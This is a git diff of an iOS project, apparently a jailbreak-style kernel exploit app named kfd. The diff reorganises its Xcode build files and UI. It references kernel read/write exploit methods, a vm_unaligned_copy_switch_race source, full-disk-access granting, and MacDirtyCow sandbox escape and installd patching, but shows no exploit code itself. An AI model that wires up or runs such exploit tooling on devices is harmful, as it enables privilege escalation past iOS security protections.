*/, - 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */, - 6ECE5B502A905FDE00792D41 /* proc.h */, - 6ECE5B512A905FDE00792D41 /* proc.c */, - 6E75BFA92A8475D30056ABDA /* fun.h */, - 6E75BFA72A8475C70056ABDA /* fun.m */, - 6E75BFAF2A847AC50056ABDA /* offsets.h */, - 6E75BFAD2A847A980056ABDA /* offsets.m */, - ); - path = fun; - sourceTree = ""; - }; 8C0AF3562A75B6BE0065C9DD /* Frameworks */ = { isa = PBXGroup; children = ( - D58309A92A9BC38800828844 /* IOKit.framework */, - D5AFB5C02ABE167C006266EA /* ProcessCommunication */, - D52BA4352AB57EC9002E9836 /* DirtyCowKit */, + D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */, ); name = Frameworks; sourceTree = ""; }; - D52BA44F2AB5812A002E9836 /* JIT */ = { + D57B52072B46995700374989 /* overwrite */ = { isa = PBXGroup; children = ( - D52BA4532AB5812A002E9836 /* DirtyJIT */, - D52BA4512AB5812A002E9836 /* ApplicationManager.swift */, + D57B521A2B46995700374989 /* fun.h */, + D57B520F2B46995700374989 /* fun.m */, + D57B520E2B46995700374989 /* krw.h */, + D57B52162B46995700374989 /* krw.c */, + D57B520B2B46995700374989 /* vnode.h */, + D57B52182B46995700374989 /* vnode.m */, + D57B52092B46995700374989 /* thanks_opa334dev_htrowii.h */, + D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */, + D57B520D2B46995700374989 /* offsets.h */, + D57B52172B46995700374989 /* offsets.m */, + D57B520C2B46995700374989 /* proc.h */, + D57B52192B46995700374989 /* proc.c */, + D57B520A2B46995700374989 /* utils.h */, + D57B52132B46995700374989 /* utils.m */, + D57B521C2B46995700374989 /* helpers.h */, + D57B52122B46995700374989 /* helpers.m */, + D5D2DD972B46A90A00B62BED /* vm_unaligned_copy_switch_race.h */, + D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */, + D5D2DD992B46A91B00B62BED /* grant_full_disk_access.h */, + D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */, ); - path = JIT; + path = overwrite; sourceTree = ""; }; - D52BA4532AB5812A002E9836 /* DirtyJIT */ = { - isa = PBXGroup; - children = ( - D52BA46C2AB586BF002E9836 /* Alert++.swift */, - D52BA46A2AB5866D002E9836 /* TextField++.swift */, - D52BA4562AB5812A002E9836 /* SearchBar.swift */, - D52BA4572AB5812A002E9836 /* DirtyJITView.swift */, - D52BA4582AB5812A002E9836 /* AppsView.swift */, - ); - path = DirtyJIT; - sourceTree = ""; - }; - D58654382ABD508B005A2379 /* filemanager_by_akusio */ = { - isa = PBXGroup; - children = ( - D58654592ABD508B005A2379 /* ViewController.m */, - D58654702ABD508B005A2379 /* ViewController.h */, - D586545A2ABD508B005A2379 /* SceneDelegate.m */, - D58654712ABD508B005A2379 /* SceneDelegate.h */, - D58654672ABD508B005A2379 /* AppDelegate.m */, - D58654512ABD508B005A2379 /* AppDelegate.h */, - D586545F2ABD508B005A2379 /* FileManager.m */, - D586543B2ABD508B005A2379 /* FileManager.h */, - D58654632ABD508B005A2379 /* AXFIle.m */, - D58654542ABD508B005A2379 /* AXFile.h */, - D58654652ABD508B005A2379 /* AXFileViewController.m */, - D58654532ABD508B005A2379 /* AXFileViewController.h */, - D58654622ABD508B005A2379 /* AXNavigationController.m */, - D58654392ABD508B005A2379 /* AXNavigationController.h */, - D58654582ABD508B005A2379 /* AXLocationBackgrounder.m */, - D586546F2ABD508B005A2379 /* AXLocationBackgrounder.h */, - D58654692ABD508B005A2379 /* patchfinder64.m */, - D58654552ABD508B005A2379 /* patchfinder64.h */, - D58654602ABD508B005A2379 /* kerneldec.cpp */, - D586546A2ABD508B005A2379 /* kstruct.h */, - D58654642ABD508B005A2379 /* kerneldec.h */, - D58654682ABD508B005A2379 /* lzssdec.cpp */, - D586546C2ABD508B005A2379 /* lzfse.h */, - D586546D2ABD508B005A2379 /* lzssdec.h */, - D58654562ABD508B005A2379 /* lzfse_fse.h */, - D586546B2ABD508B005A2379 /* lzfse_internal.h */, - D586543A2ABD508B005A2379 /* lzfse_tunables.h */, - D58654522ABD508B005A2379 /* lzfse_encode_tables.h */, - D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */, - D586545D2ABD508B005A2379 /* Main.storyboard */, - D58654662ABD508B005A2379 /* liblzfse.a */, - ); - name = filemanager_by_akusio; - path = MiniRootFileManager15/filemanager_by_akusio; - sourceTree = SOURCE_ROOT; - }; D5CB286D2AB5D02F009DF689 /* info */ = { isa = PBXGroup; children = ( @@ -388,8 +243,6 @@ ); name = kfd; packageProductDependencies = ( - D52BA4612AB58212002E9836 /* DirtyCowKit */, - D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */, ); productName = kfd; productReference = 297BA1052A310AE100D1E51A /* kfd.app */; @@ -421,7 +274,6 @@ ); mainGroup = 297BA0FC2A310AE100D1E51A; packageReferences = ( - D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */, ); productRefGroup = 297BA1062A310AE100D1E51A /* Products */; projectDirPath = ""; @@ -437,9 +289,7 @@ isa = PBXResourcesBuildPhase; buildActionMask = 2147483647; files = ( - D586547F2ABD508B005A2379 /* LaunchScreen.storyboard in Resources */, D51A38112AB5717500C147E2 /* files in Resources */, - D58654802ABD508B005A2379 /* Main.storyboard in Resources */, ); runOnlyForDeploymentPostprocessing = 0; }; @@ -450,64 +300,23 @@ isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( - D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */, - D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */, - D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */, - D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */, - D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */, - D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */, - D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */, - D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */, - D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */, - D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */, - D51A380A2AB56F8400C147E2 /* vnode.m in Sources */, - D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */, - D58654842ABD508B005A2379 /* AXNavigationController.m in Sources */, - D58654822ABD508B005A2379 /* kerneldec.cpp in Sources */, - 6E75BFAE2A847A980056ABDA /* offsets.m in Sources */, + D57B52282B46995800374989 /* proc.c in Sources */, + D57B521E2B46995800374989 /* fun.m in Sources */, + D5D2DD982B46A90A00B62BED /* vm_unaligned_copy_switch_race.c in Sources */, + D57B52212B46995800374989 /* helpers.m in Sources */, 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */, - D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */, - D51A38092AB56F8400C147E2 /* krw.c in Sources */, - 6E75BFA82A8475C70056ABDA /* fun.m in Sources */, - D51A38082AB56F8400C147E2 /* utils.m in Sources */, - D586547C2ABD508B005A2379 /* AXLocationBackgrounder.m in Sources */, - D58654882ABD508B005A2379 /* AppDelegate.m in Sources */, - D58654812ABD508B005A2379 /* FileManager.m in Sources */, - D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */, - D586547E2ABD508B005A2379 /* SceneDelegate.m in Sources */, - 6ECE5B522A905FDE00792D41 /* proc.c in Sources */, - D586548A2ABD508B005A2379 /* patchfinder64.m in Sources */, - D58654862ABD508B005A2379 /* AXFileViewController.m in Sources */, - 6E08ABFE2A9A3B9800BF5B0D /* helpers.m in Sources */, - D586547D2ABD508B005A2379 /* ViewController.m in Sources */, + D57B52262B46995800374989 /* offsets.m in Sources */, + D57B52232B46995800374989 /* thanks_opa334dev_htrowii.m in Sources */, + D57B52272B46995800374989 /* vnode.m in Sources */, + D5D2DD9B2B46A91B00B62BED /* grant_full_disk_access.m in Sources */, + D57B52222B46995800374989 /* utils.m in Sources */, + D57B52252B46995800374989 /* krw.c in Sources */, 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */, - D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */, - D51A380B2AB56F8400C147E2 /* thanks_opa334dev_htrowii.m in Sources */, - D58654852ABD508B005A2379 /* AXFIle.m in Sources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXSourcesBuildPhase section */ -/* Begin PBXVariantGroup section */ - D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */ = { - isa = PBXVariantGroup; - children = ( - D586545C2ABD508B005A2379 /* Base */, - ); - name = LaunchScreen.storyboard; - sourceTree = ""; - }; - D586545D2ABD508B005A2379 /* Main.storyboard */ = { - isa = PBXVariantGroup; - children = ( - D586545E2ABD508B005A2379 /* Base */, - ); - name = Main.storyboard; - sourceTree = ""; - }; -/* End PBXVariantGroup section */ - /* Begin XCBuildConfiguration section */ 297BA1122A310AE200D1E51A /* Debug */ = { isa = XCBuildConfiguration; @@ -664,10 +473,7 @@ "$(inherited)", "@executable_path/Frameworks", ); - LIBRARY_SEARCH_PATHS = ( - "$(inherited)", - "$(PROJECT_DIR)/MiniRootFileManager15/filemanager_by_akusio", - ); + LIBRARY_SEARCH_PATHS = "$(inherited)"; MARKETING_VERSION = 1.0; OTHER_CFLAGS = "-Os"; OTHER_LDFLAGS = ( @@ -729,10 +535,7 @@ "$(inherited)", "@executable_path/Frameworks", ); - LIBRARY_SEARCH_PATHS = ( - "$(inherited)", - "$(PROJECT_DIR)/MiniRootFileManager15/filemanager_by_akusio", - ); + LIBRARY_SEARCH_PATHS = "$(inherited)"; MARKETING_VERSION = 1.0; OTHER_CFLAGS = "-Os"; OTHER_LDFLAGS = ( @@ -776,29 +579,6 @@ defaultConfigurationName = Release; }; /* End XCConfigurationList section */ - -/* Begin XCRemoteSwiftPackageReference section */ - D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */ = { - isa = XCRemoteSwiftPackageReference; - repositoryURL = "https://github.com/ndsarno/SwiftfulLoadingIndicators.git"; - requirement = { - kind = upToNextMajorVersion; - minimumVersion = 0.0.4; - }; - }; -/* End XCRemoteSwiftPackageReference section */ - -/* Begin XCSwiftPackageProductDependency section */ - D52BA4612AB58212002E9836 /* DirtyCowKit */ = { - isa = XCSwiftPackageProductDependency; - productName = DirtyCowKit; - }; - D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */ = { - isa = XCSwiftPackageProductDependency; - package = D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */; - productName = SwiftfulLoadingIndicators; - }; -/* End XCSwiftPackageProductDependency section */ }; rootObject = 297BA0FD2A310AE100D1E51A /* Project object */; } diff --git a/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved b/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved deleted file mode 100644 index e8f04dd4..00000000 --- a/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved +++ /dev/null @@ -1,16 +0,0 @@ -{ - "object": { - "pins": [ - { - "package": "SwiftfulLoadingIndicators", - "repositoryURL": "https://github.com/ndsarno/SwiftfulLoadingIndicators.git", - "state": { - "branch": null, - "revision": "85858c0246dcd781228301f9928519f75ce89758", - "version": "0.0.4" - } - } - ] - }, - "version": 1 -} diff --git a/kfd/BottomBar.swift b/kfd/BottomBar.swift deleted file mode 100644 index 8ba0d0a0..00000000 --- a/kfd/BottomBar.swift +++ /dev/null @@ -1,83 +0,0 @@ -import SwiftUI -import BottomBar_SwiftUI - -let items: [BottomBarItem] = [ - BottomBarItem(icon: "house.fill", title: "Home", color: .purple), - BottomBarItem(icon: "heart", title: "Likes", color: .pink), - BottomBarItem(icon: "person.fill", title: "Profile", color: .blue) -] - -struct BasicView: View { - let item: BottomBarItem - - var detailText: String { - "\(item.title) Detail" -} - -var followButton: some View { - Button(action: openTwitter) { - VStack { - Text("Developed by Bezhan Odinaev") - .font(.headline) - .foregroundColor(item.color) - - Text("@smartvipere75") - .font(.subheadline) - .foregroundColor(.gray) - } - } -} - -var destination: some View { - Text(detailText) - .navigationBarTitle(Text(detailText)) -} - -var navigateButton: some View { - NavigationLink(destination: destination) { - if(item.color == .blue){ - ContentView() - } else if(item.color == .pink){ - DirtyJITView() - } else { - FileManagerUIKitViewControllerWrapper() - } - } -} - -func openTwitter() { - guard let url = URL(string: "https://twitter.com/smartvipere75") else { - return - } - UIApplication.shared.open(url, options: [:], completionHandler: nil) -} - -var body: some View { - VStack { - navigateButton - } - } -} - -struct BarContentView : View { - @State private var selectedIndex: Int = 0 - - var selectedItem: BottomBarItem { - items[selectedIndex] - } - -var body: some View { - NavigationView { - VStack { - BasicView(item: selectedItem) - .navigationBarTitle(Text(selectedItem.title)) - .toolbar { - ToolbarItem(placement: .bottomBar) { - BottomBar(selectedIndex: $selectedIndex, items: items) - } - } - //BottomBar(selectedIndex: $selectedIndex, items: items) - } - } - } -} diff --git a/kfd/CBindings/CBindings.h b/kfd/CBindings/CBindings.h deleted file mode 100644 index f9b64e82..00000000 --- a/kfd/CBindings/CBindings.h +++ /dev/null @@ -1,36 +0,0 @@ -// -// CBindings.h -// kexploitd -// -// Created by Linus Henze. -// Copyright © 2022 Pinauten GmbH. All rights reserved. -// - -#ifndef CBindings_h -#define CBindings_h - -#include -#include -#import -#include - -#include "posix_spawn.h" -#include "th_state.h" -//#include "libjailbreak.h" -//#include "wifi.h" - -extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path); -extern int loadEmbeddedSignature(NSString* filePath); -uint64_t getPCIMemorySize(void); -NSString *getBootManifestHash(void); - -// Also define some IOKit stuff... -extern const mach_port_t kIOMainPortDefault; - -extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); -extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options); -extern kern_return_t IOObjectRelease(mach_port_t object); - -extern uint64_t reboot3(uint64_t how, uint64_t unk); - -#endif /* CBindings_h */ diff --git a/kfd/CBindings/posix_spawn.h b/kfd/CBindings/posix_spawn.h deleted file mode 100644 index 23e36410..00000000 --- a/kfd/CBindings/posix_spawn.h +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. - * - * @APPLE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this - * file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_LICENSE_HEADER_END@ - */ - -#ifndef _SPAWN_PRIVATE_H_ -#define _SPAWN_PRIVATE_H_ - -#include -#include -#include -#include -#include - -#undef __API_AVAILABLE -#define __API_AVAILABLE(...) - -__BEGIN_DECLS - -int posix_spawnattr_getpcontrol_np(const posix_spawnattr_t * __restrict, int * __restrict) __API_AVAILABLE(macos(10.6), ios(3.2)); -int posix_spawnattr_setpcontrol_np(posix_spawnattr_t *, const int) __API_AVAILABLE(macos(10.6), ios(3.2)); - -int posix_spawnattr_getprocesstype_np(const posix_spawnattr_t * __restrict, int * __restrict) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_setprocesstype_np(posix_spawnattr_t *, const int) __API_AVAILABLE(macos(10.8), ios(6.0)); - -int posix_spawnattr_setcpumonitor(posix_spawnattr_t * __restrict, uint64_t, uint64_t) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_getcpumonitor(posix_spawnattr_t * __restrict, uint64_t *, uint64_t *) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_setcpumonitor_default(posix_spawnattr_t * __restrict) __API_AVAILABLE(macos(10.9), ios(6.0)); - -#if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) -int posix_spawnattr_setjetsam(posix_spawnattr_t * __restrict attr, - short flags, int priority, int memlimit) __API_UNAVAILABLE(macos) __API_AVAILABLE(ios(5.0)); -#endif /* (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ - -int posix_spawnattr_setjetsam_ext(posix_spawnattr_t * __restrict attr, - short flags, int priority, int memlimit_active, int memlimit_inactive) __API_AVAILABLE(macos(10.11), ios(9.0)); - -// time-to-relaunch after jetsam, set by launchd -int posix_spawnattr_set_jetsam_ttr_np(const posix_spawnattr_t * __restrict attr, uint32_t count, uint32_t *ttrs_millis) __OSX_AVAILABLE_STARTING(__MAC_10_15, __IPHONE_13_0); - -int posix_spawnattr_set_threadlimit_ext(posix_spawnattr_t * __restrict attr, - int thread_limit) __API_AVAILABLE(macos(10.14), ios(12.0), tvos(12.0), watchos(5.0)); - -#define POSIX_SPAWN_IMPORTANCE_PORT_COUNT 32 -int posix_spawnattr_set_importancewatch_port_np(posix_spawnattr_t * __restrict attr, - int count, mach_port_t portarray[]) __API_AVAILABLE(macos(10.9), ios(6.0)); - -int posix_spawnattr_set_registered_ports_np(posix_spawnattr_t * __restrict attr, mach_port_t portarray[], uint32_t count) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -int -posix_spawnattr_set_ptrauth_task_port_np(posix_spawnattr_t * __restrict attr, - mach_port_t port) __API_AVAILABLE(macos(10.16), ios(14.0), tvos(14.0), watchos(7.0)); - -#define POSIX_SPAWN_MACPOLICYINFO_WITHSIZE 1 -int posix_spawnattr_getmacpolicyinfo_np(const posix_spawnattr_t * __restrict, const char *, void **, size_t *) __API_AVAILABLE(macos(10.9), ios(7.0)); -int posix_spawnattr_setmacpolicyinfo_np(posix_spawnattr_t * __restrict, const char *, void *, size_t) __API_AVAILABLE(macos(10.9), ios(7.0)); - -int posix_spawnattr_setcoalition_np(const posix_spawnattr_t * __restrict, uint64_t, int, int) __API_AVAILABLE(macos(10.10), ios(8.0)); - -int posix_spawnattr_set_qos_clamp_np(const posix_spawnattr_t * __restrict, uint64_t) __API_AVAILABLE(macos(10.10), ios(8.0)); -int posix_spawnattr_get_qos_clamp_np(const posix_spawnattr_t * __restrict, uint64_t * __restrict) __API_AVAILABLE(macos(10.10), ios(8.0)); - -int posix_spawnattr_set_darwin_role_np(const posix_spawnattr_t * __restrict, uint64_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_get_darwin_role_np(const posix_spawnattr_t * __restrict, uint64_t * __restrict) __API_AVAILABLE(macos(10.11), ios(9.0)); - -int posix_spawnattr_set_persona_np(const posix_spawnattr_t * __restrict, uid_t, uint32_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_uid_np(const posix_spawnattr_t * __restrict, uid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_gid_np(const posix_spawnattr_t * __restrict, gid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_groups_np(const posix_spawnattr_t * __restrict, int, gid_t * __restrict, uid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); - -int posix_spawnattr_set_max_addr_np(const posix_spawnattr_t * __restrict attr, uint64_t max_addr) __API_AVAILABLE(macos(10.14), ios(12.0), tvos(12.0), watchos(5.0)); - -int posix_spawnattr_set_uid_np(const posix_spawnattr_t * __restrict, uid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_gid_np(const posix_spawnattr_t * __restrict, gid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_groups_np(const posix_spawnattr_t * __restrict, int, gid_t * __restrict, uid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_login_np(const posix_spawnattr_t * __restrict, const char * __restrict) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -int posix_spawnattr_set_subsystem_root_path_np(posix_spawnattr_t *attr, char *path); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawnattr_set_platform_np(posix_spawnattr_t *attr, int platform, uint32_t flags); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawnattr_disable_ptr_auth_a_keys_np(posix_spawnattr_t *attr, uint32_t flags); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawn_file_actions_add_fileportdup2_np(posix_spawn_file_actions_t * __restrict, mach_port_t, int) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -struct sandbox_spawnattrs { - uint8_t unk[8192]; -}; - -void sandbox_spawnattrs_init(struct sandbox_spawnattrs *attrs); -int sandbox_spawnattrs_setprofilename(struct sandbox_spawnattrs *attrs, const char *); -int sandbox_spawnattrs_setcontainer(struct sandbox_spawnattrs *attrs, const char *); -int sandbox_init(const char *profile, uint64_t flags, char **errorbuf); - -void* sandbox_create_params(); -int sandbox_set_param(void* params, const char* key, const char* value); -void* sandbox_compile_string(const char* profile_str, - void* params, - char** error); -int sandbox_apply(void* profile); -void sandbox_free_params(void* params); -void sandbox_free_profile(void* profile); - -struct sandbox_policy_layout { - void *profile; - uint64_t len; - void *container; - uint64_t containerLen; - uint64_t pad1; - uint64_t pad2; -}; - -int __sandbox_ms(const char* policy, int call, struct sandbox_policy_layout* arg); - -__END_DECLS - -#endif /* !defined _SPAWN_PRIVATE_H_*/ diff --git a/kfd/CBindings/th_state.h b/kfd/CBindings/th_state.h deleted file mode 100644 index c38712b5..00000000 --- a/kfd/CBindings/th_state.h +++ /dev/null @@ -1,46 +0,0 @@ - -/* - * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. - * - * @APPLE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this - * file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_LICENSE_HEADER_END@ - */ - -#ifndef TH_STATE_H_ -#define TH_STATE_H_ - -#include -#include - -#ifdef __arm64__ - -uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts); -void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc); -uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts); -void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr); - -#endif /* defined __arm64__ */ - -struct exception_message_reply { - mach_msg_header_t hdr; - NDR_record_t NDR; - kern_return_t result; -}; - -#endif /* !defined TH_STATE_H_ */ diff --git a/kfd/ContentView.swift b/kfd/ContentView.swift index ad3ba977..10a1f83d 100644 --- a/kfd/ContentView.swift +++ b/kfd/ContentView.swift @@ -1,370 +1,80 @@ +/* + * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. + */ + import SwiftUI -import UIKit -import MacDirtyCow struct ContentView: View { - @State private var kfd: UInt64 = 0 - - @State private var puafPages = 2048 - @State private var puafMethod = 1 - @State private var kreadMethod = 1 - @State private var kwriteMethod = 1 - @State private var enableHideHomebar = false - @State private var enableHideDock = false - @State private var enableResSet = false - @State private var enableReplacecert = true - @State private var enableCustomSysColors = false - @State private var changeRegion = false - @State private var whitelist = false - @State private var supervise = false - @State private var enableCustomFont = false - - var puafPagesOptions = [16, 32, 64, 128, 256, 512, 1024, 2048] - var puafMethodOptions = ["physpuppet", "smith"] - var kreadMethodOptions = ["kqueue_workloop_ctl", "sem_open"] - var kwriteMethodOptions = ["dup", "sem_open"] - - @State private var message = "ready!" - - @State private var isSettingsPopoverPresented = false // Track the visibility of the settings popup - @State private var isTweaksPopoverPresented = false - @State private var isFilePopoverPresented = false - @State private var isJITPopoverPresented = false - @State private var isSwiftFilePopoverPresented = false - - @State private var isLogPopoverPresented = false - @State var advancedLogsTemporarilyEnabled: Bool = true - @State var advancedLogsByDefault: Bool = true - @Environment(\.presentationMode) var presentation - - func unsandboxing() { - do { - try MacDirtyCow.unsandbox() - DispatchQueue.main.async { - message = "unsandboxed!" - } - if (MacDirtyCow.patch_installd() == true){ - DispatchQueue.main.async { - message = "patched installd!" - } - } else { - DispatchQueue.main.async { - message = "error occur patching installd!" - } - } - } catch { - print(error) - } - } + private var puaf_pages_options = [16, 32, 64, 128, 256, 512, 1024, 2048] + @State private var puaf_pages_index = 7 + @State private var puaf_pages = 0 + + private var puaf_method_options = ["physpuppet", "smith", "landa"] + @State private var puaf_method = 2 + + private var kread_method_options = ["kqueue_workloop_ctl", "sem_open"] + @State private var kread_method = 1 + + private var kwrite_method_options = ["dup", "sem_open"] + @State private var kwrite_method = 1 var body: some View { NavigationView { - List { - Section(header: Text("Status")) { - Text(message) - if kfd != 0 { - VStack(alignment: .leading, spacing: 8) { - Text("Success!") - .font(.headline) - .foregroundColor(.green) - Text("View output in Xcode") - .foregroundColor(.gray) + Form { + Section { + Picker(selection: $puaf_pages_index, label: Text("puaf pages:")) { + ForEach(0 ..< puaf_pages_options.count, id: \.self) { + Text(String(self.puaf_pages_options[$0])) } - } + }.disabled(kfd != 0) } - - Section(header: Text("actions")) { - Text("kopen") - .onTapGesture{ - kfd = do_kopen(UInt64(puafPages), UInt64(puafMethod), UInt64(kreadMethod), UInt64(kwriteMethod)) - DispatchQueue.main.async { - message = "kopened!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd != 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("kclose") - .onTapGesture{ - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclosed!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("fun and kclose") - .onTapGesture{ - let tweaks = enabledTweaks() - var cTweaks: [UnsafeMutablePointer?] = tweaks.map { strdup($0) } - cTweaks.append(nil) - cTweaks.withUnsafeMutableBufferPointer { buffer in - do_fun(buffer.baseAddress, Int32(buffer.count - 1)) - } - cTweaks.forEach { free($0) } - DispatchQueue.main.async { - message = "done fun!" - } - usleep(1000) - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclose!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("do kfd tasks and kclose") - .onTapGesture{ - do_tasks() - DispatchQueue.main.async { - message = "done!" - } - usleep(1000) - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclose!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("patch installd w/mdc") - .onTapGesture{ - print("mdc") - unsandboxing() - DispatchQueue.main.async { - message = "sucecss!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("kill backboardd") - .onTapGesture{ - backboard_respring() - DispatchQueue.main.async { - message = "sucecss!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - } - - Section(header: Text("Settings")) { - Button(action: { - isSettingsPopoverPresented.toggle() - }, label: {Text("Exploit Setting")}).foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - Button(action: { - isTweaksPopoverPresented.toggle() - }, label: {Text("Tweak Setting")}).foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - }.buttonStyle(BorderlessButtonStyle()) - - Section(header: Text("Tools")) { - Text("Dirty JIT") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - isJITPopoverPresented.toggle() - } - Text("Swift File Manager") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - isSwiftFilePopoverPresented.toggle() - } - Text("File Manager") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - if (check_mdc()) { - do_tasks() - } else { - MacDirtyCow.unsandboxing() - } - isFilePopoverPresented.toggle() + Section { + Picker(selection: $puaf_method, label: Text("puaf method:")) { + ForEach(0 ..< puaf_method_options.count, id: \.self) { + Text(self.puaf_method_options[$0]) } + }.disabled(kfd != 0) } - } - 